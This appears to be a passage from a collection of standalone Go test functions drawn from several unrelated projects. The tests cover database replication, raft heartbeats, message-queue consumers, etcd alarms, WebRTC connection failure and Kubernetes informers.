{\n\t\treturn rt.GetDatabase().DbStats.CBLReplicationPull().NumPullReplCaughtUp.Value()\n\t}, 1)\n}", "func TestClientHeartbeatBadServer(t *testing.T) {\n\ttlsConfig, err := LoadTestTLSConfig(\"..\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\taddr := util.CreateTestAddr(\"tcp\")\n\t// Create a server which doesn't support heartbeats.\n\ts := &Server{\n\t\tServer: rpc.NewServer(),\n\t\ttlsConfig: tlsConfig,\n\t\taddr: addr,\n\t\tcloseCallbacks: make([]func(conn net.Conn), 0, 1),\n\t}\n\tif err := s.Start(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Now, create a client. It should attempt a heartbeat and fail,\n\t// causing retry loop to activate.\n\tc := NewClient(s.Addr(), nil, tlsConfig)\n\tselect {\n\tcase <-c.Ready:\n\t\tt.Error(\"unexpected client heartbeat success\")\n\tcase <-c.Closed:\n\t}\n\ts.Close()\n}", "func (s *PartitionCsmSuite) TestRetryNoMoreMessages(c *C) {\n\tnewestOffsets := s.kh.GetNewestOffsets(topic)\n\toffsetBefore := newestOffsets[partition] - int64(2)\n\ts.cfg.Consumer.AckTimeout = 100 * time.Millisecond\n\ts.cfg.Consumer.MaxRetries = 3\n\ts.kh.SetOffsets(group, topic, []offsetmgr.Offset{{Val: offsetBefore}})\n\n\tpc := Spawn(s.ns, group, topic, partition, s.cfg, s.groupMember, s.msgFetcherF, s.offsetMgrF)\n\n\t// Read and confirm offer of 4 messages\n\tvar messages []consumer.Message\n\tfor i := 0; i < 2; i++ {\n\t\tmsg := <-pc.Messages()\n\t\tsendEvOffered(msg)\n\t\tmessages = append(messages, msg)\n\t}\n\n\t// Wait for all offers to expire...\n\ttime.Sleep(100 * time.Millisecond)\n\n\t// Then: Since there are no more messages in the partition, then the next\n\t// message returned is a retry.\n\tmsg0_i := <-pc.Messages()\n\tc.Assert(msg0_i, DeepEquals, messages[0], Commentf(\n\t\t\"got: %d, want: %d\", msg0_i.Offset, messages[0].Offset))\n\n\tpc.Stop()\n\toffsetsAfter := s.kh.GetCommittedOffsets(group, topic)\n\tc.Assert(offsetsAfter[partition].Val, Equals, offsetBefore)\n\tc.Assert(offsettrk.SparseAcks2Str(offsetsAfter[partition]), Equals, \"\")\n}", "func TestNoRaceAvoidSlowConsumerBigMessages(t *testing.T) {\n\topts := DefaultOptions() // Use defaults to make sure they avoid pending slow consumer.\n\ts := RunServer(opts)\n\tdefer s.Shutdown()\n\n\tnc1, err := nats.Connect(fmt.Sprintf(\"nats://%s:%d\", opts.Host, opts.Port))\n\tif err != nil {\n\t\tt.Fatalf(\"Error on connect: %v\", err)\n\t}\n\tdefer nc1.Close()\n\n\tnc2, err := nats.Connect(fmt.Sprintf(\"nats://%s:%d\", opts.Host, opts.Port))\n\tif err != nil {\n\t\tt.Fatalf(\"Error on connect: %v\", err)\n\t}\n\tdefer nc2.Close()\n\n\tdata := make([]byte, 1024*1024) // 1MB payload\n\trand.Read(data)\n\n\texpected := int32(500)\n\treceived := int32(0)\n\n\tdone := make(chan bool)\n\n\t// Create Subscription.\n\tnc1.Subscribe(\"slow.consumer\", func(m *nats.Msg) {\n\t\t// Just eat it so that we are not measuring\n\t\t// code time, just delivery.\n\t\tatomic.AddInt32(&received, 1)\n\t\tif received >= expected {\n\t\t\tdone <- true\n\t\t}\n\t})\n\n\t// Create Error handler\n\tnc1.SetErrorHandler(func(c *nats.Conn, s *nats.Subscription, err error) {\n\t\tt.Fatalf(\"Received an error on the subscription's connection: %v\\n\", err)\n\t})\n\n\tnc1.Flush()\n\n\tfor i := 0; i < int(expected); i++ {\n\t\tnc2.Publish(\"slow.consumer\", data)\n\t}\n\tnc2.Flush()\n\n\tselect {\n\tcase <-done:\n\t\treturn\n\tcase <-time.After(10 * time.Second):\n\t\tr := atomic.LoadInt32(&received)\n\t\tif s.NumSlowConsumers() > 0 {\n\t\t\tt.Fatalf(\"Did not receive all large messages due to slow consumer status: %d of %d\", r, expected)\n\t\t}\n\t\tt.Fatalf(\"Failed to receive all large messages: %d of %d\\n\", r, expected)\n\t}\n}", "func TestMonitorDeactivation(t *testing.T) {\n\thelper := newHelper(t)\n\tdefer helper.Close()\n\n\thelper.preregisterAgent(t)\n\thelper.addMonitorOnAPI(t)\n\thelper.initSynchronizer(t)\n\thelper.AddTime(time.Minute)\n\n\t// This should NOT be needed. Glouton should not need to be able to read the\n\t// monitor agent to works.\n\t// Currently Glouton public probe are allowed to view such agent. Glouton private probe aren't.\n\thelper.api.resources[\"agent\"].AddStore(newMonitorAgent)\n\n\tidAgentMain, _ := helper.state.BleemeoCredentials()\n\n\tinitialMetrics := []metricPayload{\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"90c6459c-851d-4bb4-957c-afbc695c2201\",\n\t\t\t\tAgentID: newMonitor.AgentID,\n\t\t\t\tLabelsText: fmt.Sprintf(\n\t\t\t\t\t\"__name__=\\\"probe_success\\\",instance=\\\"http://localhost:8000/\\\",instance_uuid=\\\"%s\\\",scraper=\\\"paris\\\"\",\n\t\t\t\t\tnewMonitor.AgentID,\n\t\t\t\t),\n\t\t\t},\n\t\t\tName: \"probe_success\",\n\t\t},\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"9149d491-3a6e-4f46-abf9-c1ea9b9f7227\",\n\t\t\t\tAgentID: newMonitor.AgentID,\n\t\t\t\tLabelsText: fmt.Sprintf(\n\t\t\t\t\t\"__name__=\\\"probe_success\\\",instance=\\\"http://localhost:8000/\\\",instance_uuid=\\\"%s\\\",scraper=\\\"milan\\\"\",\n\t\t\t\t\tnewMonitor.AgentID,\n\t\t\t\t),\n\t\t\t},\n\t\t\tName: \"probe_success\",\n\t\t},\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"92c0b336-6e5a-4960-94cc-b606db8a581f\",\n\t\t\t\tAgentID: newMonitor.AgentID,\n\t\t\t\tLabelsText: fmt.Sprintf(\n\t\t\t\t\t\"__name__=\\\"probe_status\\\",instance=\\\"http://localhost:8000/\\\",instance_uuid=\\\"%s\\\"\",\n\t\t\t\t\tnewMonitor.AgentID,\n\t\t\t\t),\n\t\t\t},\n\t\t\tName: \"probe_status\",\n\t\t},\n\t}\n\n\tpushedPoints := []labels.Labels{\n\t\tlabels.New(\n\t\t\tlabels.Label{Name: types.LabelName, Value: \"probe_success\"},\n\t\t\tlabels.Label{Name: types.LabelScraper, Value: \"paris\"},\n\t\t\tlabels.Label{Name: types.LabelInstance, Value: \"http://localhost:8000/\"},\n\t\t\tlabels.Label{Name: types.LabelInstanceUUID, Value: newMonitor.AgentID},\n\t\t\tlabels.Label{Name: types.LabelMetaBleemeoTargetAgentUUID, Value: newMonitor.AgentID},\n\t\t),\n\t\tlabels.New(\n\t\t\tlabels.Label{Name: types.LabelName, Value: \"probe_duration\"},\n\t\t\tlabels.Label{Name: types.LabelScraper, Value: \"paris\"},\n\t\t\tlabels.Label{Name: types.LabelInstance, Value: \"http://localhost:8000/\"},\n\t\t\tlabels.Label{Name: types.LabelInstanceUUID, Value: newMonitor.AgentID},\n\t\t\tlabels.Label{Name: types.LabelMetaBleemeoTargetAgentUUID, Value: newMonitor.AgentID},\n\t\t),\n\t}\n\n\thelper.SetAPIMetrics(initialMetrics...)\n\thelper.pushPoints(t, pushedPoints)\n\n\tif err := helper.runOnceWithResult(t).CheckMethodWithFull(syncMethodMetric); err != nil {\n\t\tt.Error(err)\n\t}\n\n\tmetrics := helper.MetricsFromAPI()\n\twant := []metricPayload{\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"1\",\n\t\t\t\tAgentID: idAgentMain,\n\t\t\t\tLabelsText: \"\",\n\t\t\t},\n\t\t\tName: agentStatusName,\n\t\t},\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"2\",\n\t\t\t\tAgentID: newMonitor.AgentID,\n\t\t\t\tLabelsText: fmt.Sprintf(\n\t\t\t\t\t\"__name__=\\\"probe_duration\\\",instance=\\\"http://localhost:8000/\\\",instance_uuid=\\\"%s\\\",scraper=\\\"paris\\\"\",\n\t\t\t\t\tnewMonitor.AgentID,\n\t\t\t\t),\n\t\t\t\tServiceID: newMonitor.ID,\n\t\t\t},\n\t\t\tName: \"probe_duration\",\n\t\t},\n\t}\n\n\twant = append(want, initialMetrics...)\n\n\tif diff := cmp.Diff(want, metrics); diff != \"\" {\n\t\tt.Fatalf(\"metrics mismatch (-want +got):\\n%s\", diff)\n\t}\n\n\thelper.SetTimeToNextFullSync()\n\thelper.pushPoints(t, pushedPoints)\n\n\tif err := helper.runOnceWithResult(t).CheckMethodWithFull(syncMethodMetric); err != nil {\n\t\tt.Error(err)\n\t}\n\n\tmetrics = helper.MetricsFromAPI()\n\n\tif diff := cmp.Diff(want, metrics); diff != \"\" {\n\t\tt.Errorf(\"metrics mismatch (-want +got):\\n%s\", diff)\n\t}\n\n\thelper.SetTimeToNextFullSync()\n\thelper.AddTime(60 * time.Minute)\n\n\tif err := helper.runOnceWithResult(t).CheckMethodWithFull(syncMethodMetric); err != nil {\n\t\tt.Error(err)\n\t}\n\n\tmetrics = helper.MetricsFromAPI()\n\n\twant = []metricPayload{\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"1\",\n\t\t\t\tAgentID: idAgentMain,\n\t\t\t\tLabelsText: \"\",\n\t\t\t},\n\t\t\tName: agentStatusName,\n\t\t},\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"2\",\n\t\t\t\tAgentID: newMonitor.AgentID,\n\t\t\t\tLabelsText: fmt.Sprintf(\n\t\t\t\t\t\"__name__=\\\"probe_duration\\\",instance=\\\"http://localhost:8000/\\\",instance_uuid=\\\"%s\\\",scraper=\\\"paris\\\"\",\n\t\t\t\t\tnewMonitor.AgentID,\n\t\t\t\t),\n\t\t\t\tDeactivatedAt: helper.s.now(),\n\t\t\t\tServiceID: newMonitor.ID,\n\t\t\t},\n\t\t\tName: \"probe_duration\",\n\t\t},\n\t\t{\n\t\t\tMetric: bleemeoTypes.Metric{\n\t\t\t\tID: \"90c6459c-851d-4bb4-957c-afbc695c2201\",\n\t\t\t\tAgentID: newMonitor.AgentID,\n\t\t\t\tLabelsText: fmt.Sprintf(\n\t\t\t\t\t\"__name__=\\\"probe_success\\\",instance=\\\"http://localhost:8000/\\\",instance_uuid=\\\"%s\\\",scraper=\\\"paris\\\"\",\n\t\t\t\t\tnewMonitor.AgentID,\n\t\t\t\t),\n\t\t\t\tDeactivatedAt: helper.s.now(),\n\t\t\t},\n\t\t\tName: \"probe_success\",\n\t\t},\n\t\tinitialMetrics[1],\n\t\tinitialMetrics[2],\n\t}\n\n\tif diff := cmp.Diff(want, metrics); diff != \"\" {\n\t\tt.Errorf(\"metrics mismatch (-want +got):\\n%s\", diff)\n\t}\n}", "func TestPromoteReplicaHealthTicksStopped(t *testing.T) {\n\tctx := context.Background()\n\tts := memorytopo.NewServer(\"cell1\")\n\tstatsTabletTypeCount.ResetAll()\n\ttm := newTestTM(t, ts, 100, keyspace, shard)\n\tdefer tm.Stop()\n\n\t_, err := tm.PromoteReplica(ctx, false)\n\trequire.NoError(t, err)\n\trequire.False(t, tm.replManager.ticks.Running())\n}", "func TestServerDown(t *testing.T) {\n\tetcd, err := embedserver.New()\n\trequire.Nil(t, err)\n\n\tc, err := NewClient([]string{etcd.ListenAddr()})\n\trequire.Nil(t, err)\n\n\tkey := \"key\"\n\tmd := New([]byte(key))\n\n\t// make sure we can do some operation to server\n\terr = c.Put(key, md)\n\trequire.Nil(t, err)\n\n\t_, err = c.Get(key)\n\trequire.Nil(t, err)\n\n\t// stop the server\n\tetcd.Stop()\n\n\t// test the PUT\n\tdone := make(chan struct{}, 1)\n\tgo func() {\n\t\terr = c.Put(key, md)\n\t\t_, ok := err.(net.Error)\n\t\trequire.True(t, ok)\n\t\tdone <- struct{}{}\n\t}()\n\n\tselect {\n\tcase <-time.After(metaOpTimeout + (5 * time.Second)):\n\t\t// the put operation should be exited before the timeout\n\t\tt.Error(\"the operation should already returns with error\")\n\tcase <-done:\n\t\tt.Logf(\"operation exited successfully\")\n\t}\n\n\t// test the GET\n\tdone = make(chan struct{}, 1)\n\tgo func() {\n\t\t_, err = c.Get(key)\n\t\t_, ok := err.(net.Error)\n\t\trequire.True(t, ok)\n\t\tdone <- struct{}{}\n\t}()\n\n\tselect {\n\tcase <-time.After(metaOpTimeout + (5 * time.Second)):\n\t\t// the Get operation should be exited before the timeout\n\t\tt.Error(\"the operation should already returns with error\")\n\tcase <-done:\n\t\tt.Logf(\"operation exited successfully\")\n\t}\n\n}", "func TestV3AlarmDeactivate(t *testing.T) {\n\tintegration.BeforeTest(t)\n\n\tclus := integration.NewCluster(t, &integration.ClusterConfig{Size: 3})\n\tdefer clus.Terminate(t)\n\tkvc := integration.ToGRPC(clus.RandClient()).KV\n\tmt := integration.ToGRPC(clus.RandClient()).Maintenance\n\n\talarmReq := &pb.AlarmRequest{\n\t\tMemberID: 123,\n\t\tAction: pb.AlarmRequest_ACTIVATE,\n\t\tAlarm: pb.AlarmType_NOSPACE,\n\t}\n\tif _, err := mt.Alarm(context.TODO(), alarmReq); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tkey := []byte(\"abc\")\n\tsmallbuf := make([]byte, 512)\n\t_, err := kvc.Put(context.TODO(), &pb.PutRequest{Key: key, Value: smallbuf})\n\tif err == nil && !eqErrGRPC(err, rpctypes.ErrGRPCNoSpace) {\n\t\tt.Fatalf(\"put got %v, expected %v\", err, rpctypes.ErrGRPCNoSpace)\n\t}\n\n\talarmReq.Action = pb.AlarmRequest_DEACTIVATE\n\tif _, err = mt.Alarm(context.TODO(), alarmReq); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif _, err = kvc.Put(context.TODO(), &pb.PutRequest{Key: key, Value: smallbuf}); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestInvalidFingerprintCausesFailed(t *testing.T) {\n\treport := test.CheckRoutines(t)\n\tdefer report()\n\n\tpcOffer, err := NewPeerConnection(Configuration{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tpcAnswer, err := NewPeerConnection(Configuration{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tdefer closePairNow(t, pcOffer, pcAnswer)\n\n\tofferChan := make(chan SessionDescription)\n\tpcOffer.OnICECandidate(func(candidate *ICECandidate) {\n\t\tif candidate == nil {\n\t\t\tofferChan <- *pcOffer.PendingLocalDescription()\n\t\t}\n\t})\n\n\tconnectionHasFailed, closeFunc := context.WithCancel(context.Background())\n\tpcAnswer.OnConnectionStateChange(func(connectionState PeerConnectionState) {\n\t\tif connectionState == PeerConnectionStateFailed {\n\t\t\tcloseFunc()\n\t\t}\n\t})\n\n\tif _, err = pcOffer.CreateDataChannel(\"unusedDataChannel\", nil); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\toffer, err := pcOffer.CreateOffer(nil)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t} else if err := pcOffer.SetLocalDescription(offer); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tselect {\n\tcase offer := <-offerChan:\n\t\t// Replace with invalid fingerprint\n\t\tre := regexp.MustCompile(`sha-256 (.*?)\\r`)\n\t\toffer.SDP = re.ReplaceAllString(offer.SDP, \"sha-256 AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA\\r\")\n\n\t\tif err := pcAnswer.SetRemoteDescription(offer); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tanswer, err := pcAnswer.CreateAnswer(nil)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tif err = pcAnswer.SetLocalDescription(answer); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\terr = pcOffer.SetRemoteDescription(answer)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\tcase <-time.After(5 * time.Second):\n\t\tt.Fatal(\"timed out waiting to receive offer\")\n\t}\n\n\tselect {\n\tcase <-connectionHasFailed.Done():\n\tcase <-time.After(30 * time.Second):\n\t\tt.Fatal(\"timed out waiting for connection to fail\")\n\t}\n}", "func TestProgressResumeByHeartbeatResp(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1, 2}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tr.prs[2].Paused = true\n\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\tif !r.prs[2].Paused {\n\t\tt.Errorf(\"paused = %v, want true\", r.prs[2].Paused)\n\t}\n\n\tr.prs[2].becomeReplicate()\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeatResp})\n\tif r.prs[2].Paused {\n\t\tt.Errorf(\"paused = %v, want false\", r.prs[2].Paused)\n\t}\n}", "func TestRemoveEdgeReturnOld(t *testing.T) {\n\tvar ctx context.Context\n\tc := createClient(t, nil)\n\tskipBelowVersion(c, \"3.4\", t) // See https://github.com/arangodb/arangodb/issues/2363\n\tdb := ensureDatabase(ctx, c, \"edge_test\", nil, t)\n\tprefix := \"remove_edge_returnOld_\"\n\tg := ensureGraph(ctx, db, prefix+\"graph\", nil, t)\n\tec := ensureEdgeCollection(ctx, g, prefix+\"citiesPerState\", []string{prefix + \"city\"}, []string{prefix + \"state\"}, t)\n\tcities := ensureCollection(ctx, db, prefix+\"city\", nil, t)\n\tstates := ensureCollection(ctx, db, prefix+\"state\", nil, t)\n\tfrom := createDocument(ctx, cities, map[string]interface{}{\"name\": \"Venlo\"}, t)\n\tto := createDocument(ctx, states, map[string]interface{}{\"name\": \"Limburg\"}, t)\n\n\tdoc := RouteEdge{\n\t\tFrom: from.ID.String(),\n\t\tTo: to.ID.String(),\n\t\tDistance: 32,\n\t}\n\tmeta, err := ec.CreateDocument(ctx, doc)\n\trequire.NoError(t, err)\n\n\tvar old RouteEdge\n\tctx = driver.WithReturnOld(ctx, &old)\n\n\t_, err = ec.RemoveDocument(ctx, meta.Key)\n\trequire.NoError(t, err)\n\n\t// Check an old document\n\trequire.Equal(t, doc, old)\n}", "func TestHandleHeartbeat(t *testing.T) {\n\tcommit := uint64(2)\n\ttests := []struct {\n\t\tm pb.Message\n\t\twCommit uint64\n\t}{\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit + 1}, commit + 1},\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit - 1}, commit}, // do not decrease commit\n\t}\n\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\t\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\t\tsm.becomeFollower(2, 2)\n\t\tsm.raftLog.commitTo(commit)\n\t\tsm.handleHeartbeat(tt.m)\n\t\tif sm.raftLog.committed != tt.wCommit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, sm.raftLog.committed, tt.wCommit)\n\t\t}\n\t\tm := sm.readMessages()\n\t\tif len(m) != 1 {\n\t\t\tt.Fatalf(\"#%d: msg = nil, want 1\", i)\n\t\t}\n\t\tif m[0].Type != pb.MsgHeartbeatResp {\n\t\t\tt.Errorf(\"#%d: type = %v, want MsgHeartbeatResp\", i, m[0].Type)\n\t\t}\n\t}\n}", "func validateRemovals(desc *roachpb.RangeDescriptor, chgsByStoreID changesByStoreID) error {\n\tfor storeID, chgs := range chgsByStoreID {\n\t\tfor _, chg := range chgs {\n\t\t\tif chg.ChangeType.IsAddition() {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\treplDesc, found := desc.GetReplicaDescriptor(storeID)\n\t\t\tif !found {\n\t\t\t\treturn errors.AssertionFailedf(\"trying to remove a replica that doesn't exist: %+v\", chg)\n\t\t\t}\n\t\t\t// Ensure that the type of replica being removed is the same as the type\n\t\t\t// of replica present in the range descriptor.\n\t\t\tswitch t := replDesc.GetType(); t {\n\t\t\tcase roachpb.VOTER_FULL, roachpb.LEARNER:\n\t\t\t\tif chg.ChangeType != roachpb.REMOVE_VOTER {\n\t\t\t\t\treturn errors.AssertionFailedf(\"type of replica being removed (%s) does not match\"+\n\t\t\t\t\t\t\" expectation for change: %+v\", t, chg)\n\t\t\t\t}\n\t\t\tcase roachpb.NON_VOTER:\n\t\t\t\tif chg.ChangeType != roachpb.REMOVE_NON_VOTER {\n\t\t\t\t\treturn errors.AssertionFailedf(\"type of replica being removed (%s) does not match\"+\n\t\t\t\t\t\t\" expectation for change: %+v\", t, chg)\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\treturn errors.AssertionFailedf(\"unexpected replica type for removal %+v: %s\", chg, t)\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func TestInformerWatcherDeletedFinalStateUnknown(t *testing.T) {\n\tlistCalls := 0\n\twatchCalls := 0\n\tlw := &cache.ListWatch{\n\t\tListFunc: func(options metav1.ListOptions) (runtime.Object, error) {\n\t\t\tretval := &corev1.SecretList{}\n\t\t\tif listCalls == 0 {\n\t\t\t\t// Return a list with items in it\n\t\t\t\tretval.ResourceVersion = \"1\"\n\t\t\t\tretval.Items = []corev1.Secret{{ObjectMeta: metav1.ObjectMeta{Name: \"secret1\", Namespace: \"ns1\", ResourceVersion: \"123\"}}}\n\t\t\t} else {\n\t\t\t\t// Return empty lists after the first call\n\t\t\t\tretval.ResourceVersion = \"2\"\n\t\t\t}\n\t\t\tlistCalls++\n\t\t\treturn retval, nil\n\t\t},\n\t\tWatchFunc: func(options metav1.ListOptions) (watch.Interface, error) {\n\t\t\tw := watch.NewRaceFreeFake()\n\t\t\tif options.ResourceVersion == \"1\" {\n\t\t\t\tgo func() {\n\t\t\t\t\t// Close with a \"Gone\" error when trying to start a watch from the first list\n\t\t\t\t\tw.Error(&apierrors.NewGone(\"gone\").ErrStatus)\n\t\t\t\t\tw.Stop()\n\t\t\t\t}()\n\t\t\t}\n\t\t\twatchCalls++\n\t\t\treturn w, nil\n\t\t},\n\t}\n\t_, _, w, done := NewIndexerInformerWatcher(lw, &corev1.Secret{})\n\tdefer w.Stop()\n\n\t// Expect secret add\n\tselect {\n\tcase event, ok := <-w.ResultChan():\n\t\tif !ok {\n\t\t\tt.Fatal(\"unexpected close\")\n\t\t}\n\t\tif event.Type != watch.Added {\n\t\t\tt.Fatalf(\"expected Added event, got %#v\", event)\n\t\t}\n\t\tif event.Object.(*corev1.Secret).ResourceVersion != \"123\" {\n\t\t\tt.Fatalf(\"expected added Secret with rv=123, got %#v\", event.Object)\n\t\t}\n\tcase <-time.After(time.Second * 10):\n\t\tt.Fatal(\"timeout\")\n\t}\n\n\t// Expect secret delete because the relist was missing the secret\n\tselect {\n\tcase event, ok := <-w.ResultChan():\n\t\tif !ok {\n\t\t\tt.Fatal(\"unexpected close\")\n\t\t}\n\t\tif event.Type != watch.Deleted {\n\t\t\tt.Fatalf(\"expected Deleted event, got %#v\", event)\n\t\t}\n\t\tif event.Object.(*corev1.Secret).ResourceVersion != \"123\" {\n\t\t\tt.Fatalf(\"expected deleted Secret with rv=123, got %#v\", event.Object)\n\t\t}\n\tcase <-time.After(time.Second * 10):\n\t\tt.Fatal(\"timeout\")\n\t}\n\n\tw.Stop()\n\tselect {\n\tcase <-done:\n\tcase <-time.After(time.Second * 10):\n\t\tt.Fatal(\"timeout\")\n\t}\n\n\tif listCalls < 2 {\n\t\tt.Fatalf(\"expected at least 2 list calls, got %d\", listCalls)\n\t}\n\tif watchCalls < 1 {\n\t\tt.Fatalf(\"expected at least 1 watch call, got %d\", watchCalls)\n\t}\n}", "func TestMetamaskFix2WithoutBlacklist(t *testing.T) {\n\tresetTestServers()\n\n\treq_getTransactionCount := server.NewJsonRpcRequest(1, \"eth_getTransactionCount\", []interface{}{TestTx_MM2_From, \"latest\"})\n\ttxCountBefore := sendRpcAndParseResponseOrFailNowString(t, req_getTransactionCount)\n\n\t// first sendRawTransaction call: rawTx that triggers the error (creates MM cache entry)\n\treq_sendRawTransaction := server.NewJsonRpcRequest(1, \"eth_sendRawTransaction\", []interface{}{TestTx_MM2_RawTx})\n\tr1 := sendRpcAndParseResponseOrFailNowAllowRpcError(t, req_sendRawTransaction)\n\trequire.Nil(t, r1.Error, r1.Error)\n\tfmt.Printf(\"\\n\\n\\n\\n\\n\")\n\n\t// Set the clock to normal, so that more than 16 minutes have passed and we can trigger\n\tserver.Now = time.Now\n\treq_getTransactionReceipt := server.NewJsonRpcRequest(1, \"eth_getTransactionReceipt\", []interface{}{TestTx_MM2_Hash})\n\tjsonResp := sendRpcAndParseResponseOrFailNow(t, req_getTransactionReceipt)\n\t_ = jsonResp\n\trequire.Equal(t, \"null\", string(jsonResp.Result))\n\n\t// At this point, the tx hash should be blacklisted and too high a nonce is returned\n\tvalueAfter1 := sendRpcAndParseResponseOrFailNowString(t, req_getTransactionCount)\n\trequire.Equal(t, txCountBefore, valueAfter1, \"getTxCount #1\")\n}", "func TestActiveReplicatorRecoverFromMismatchedRev(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyBucket, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\t// Passive\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: base.GetTestBucket(t),\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt2.Close()\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build passiveDBURL with basic auth creds\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\t// Active\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: base.GetTestBucket(t),\n\t})\n\tdefer rt1.Close()\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePushAndPull,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\trequire.NoError(t, err)\n\n\tassert.NoError(t, ar.Start())\n\n\tpushCheckpointID := ar.Push.CheckpointID\n\tpushCheckpointDocID := base.SyncPrefix + \"local:checkpoint/\" + pushCheckpointID\n\terr = rt2.Bucket().Set(pushCheckpointDocID, 0, nil, map[string]interface{}{\"last_sequence\": \"0\", \"_rev\": \"abc\"})\n\trequire.NoError(t, err)\n\n\tpullCheckpointID := ar.Pull.CheckpointID\n\trequire.NoError(t, err)\n\tpullCheckpointDocID := base.SyncPrefix + \"local:checkpoint/\" + pullCheckpointID\n\terr = rt1.Bucket().Set(pullCheckpointDocID, 0, nil, map[string]interface{}{\"last_sequence\": \"0\", \"_rev\": \"abc\"})\n\trequire.NoError(t, err)\n\n\t// Create doc1 on rt1\n\tdocID := t.Name() + \"rt1doc\"\n\tresp := rt1.SendAdminRequest(http.MethodPut, \"/db/\"+docID, `{\"source\":\"rt1\",\"channels\":[\"alice\"]}`)\n\tassertStatus(t, resp, http.StatusCreated)\n\tassert.NoError(t, rt1.WaitForPendingChanges())\n\n\t// wait for document originally written to rt1 to arrive at rt2\n\tchangesResults, err := rt2.WaitForChanges(1, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, 1)\n\tassert.Equal(t, docID, changesResults.Results[0].ID)\n\n\t// Create doc2 on rt2\n\tdocID = t.Name() + \"rt2doc\"\n\tresp = rt2.SendAdminRequest(http.MethodPut, \"/db/\"+docID, `{\"source\":\"rt2\",\"channels\":[\"alice\"]}`)\n\tassertStatus(t, resp, http.StatusCreated)\n\tassert.NoError(t, rt2.WaitForPendingChanges())\n\n\t// wait for document originally written to rt2 to arrive at rt1\n\tchangesResults, err = rt1.WaitForChanges(1, \"/db/_changes?since=1\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, 